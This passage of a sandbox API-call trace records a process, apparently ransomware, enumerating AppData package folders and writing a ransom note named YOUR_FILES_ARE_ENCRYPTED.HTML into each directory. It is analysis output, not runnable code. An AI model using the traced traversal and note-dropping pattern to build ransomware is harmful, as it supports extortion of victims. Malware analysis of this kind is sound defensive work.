lpOverlapped=0x30f2fc0) returned 1 [0114.806] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x90bada42, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90bada42, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90bada42, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0114.806] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.806] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 115 [0114.806] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0114.806] lstrlenW (lpString=".LOG1") returned 5 [0114.806] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0114.807] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x90bada42, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90bada42, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90bada42, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0114.807] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.807] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 115 [0114.807] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0114.807] lstrlenW (lpString=".LOG2") returned 5 [0114.807] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0114.807] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x90bada42, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x90bada42, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x90bada42, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0114.807] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0114.807] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0114.807] GetProcessHeap () returned 0x600000 [0114.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.808] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.809] CloseHandle (hObject=0x324) returned 1 [0114.809] GetProcessHeap () returned 0x600000 [0114.809] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.809] GetProcessHeap () returned 0x600000 [0114.809] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.809] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0114.809] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.809] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData") returned 102 [0114.809] GetProcessHeap () returned 0x600000 [0114.809] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.809] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData" [0114.809] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData\\*" [0114.810] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0114.810] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.810] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.810] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0114.810] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0114.810] GetProcessHeap () returned 0x600000 [0114.810] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.810] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.811] CloseHandle (hObject=0x324) returned 1 [0114.811] GetProcessHeap () returned 0x600000 [0114.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.811] GetProcessHeap () returned 0x600000 [0114.811] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.811] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0114.812] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.812] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState") returned 98 [0114.812] GetProcessHeap () returned 0x600000 [0114.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.812] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState" [0114.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState\\*" [0114.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0114.812] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.812] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.812] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0114.812] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0114.812] GetProcessHeap () returned 0x600000 [0114.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.813] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.814] CloseHandle (hObject=0x324) returned 1 [0114.814] GetProcessHeap () returned 0x600000 [0114.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.814] GetProcessHeap () returned 0x600000 [0114.814] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.814] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0114.814] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.814] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0114.814] GetProcessHeap () returned 0x600000 [0114.814] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0114.815] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0114.816] CloseHandle (hObject=0x320) returned 1 [0114.816] GetProcessHeap () returned 0x600000 [0114.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.816] GetProcessHeap () returned 0x600000 [0114.816] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0114.817] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.Appconnector_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.APP")) returned 1 [0114.817] StrStrIW (lpFirst="Microsoft.Appconnector_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.817] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe") returned 85 [0114.817] GetProcessHeap () returned 0x600000 [0114.817] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0114.818] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe" [0114.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\*" [0114.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x33e61382, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x360bb815, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x360bb815, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0114.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x341a87b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x341a87b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x344a3528, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0114.828] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.828] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC") returned 88 [0114.828] GetProcessHeap () returned 0x600000 [0114.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.829] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC" [0114.829] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\*" [0114.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x341a87b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x341a87b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x344a3528, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName=".", cAlternateFileName="")) returned 0x626838 [0114.831] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x341a87b5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x341a87b5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x344a3528, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="..", cAlternateFileName="")) returned 1 [0114.831] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x343e494a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187d9c, dwReserved1=0x3187cf0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0114.831] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.831] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache") returned 98 [0114.831] GetProcessHeap () returned 0x600000 [0114.831] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.833] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache" [0114.833] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache\\*" [0114.833] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Appconnector_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x343e494a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x343e494a, 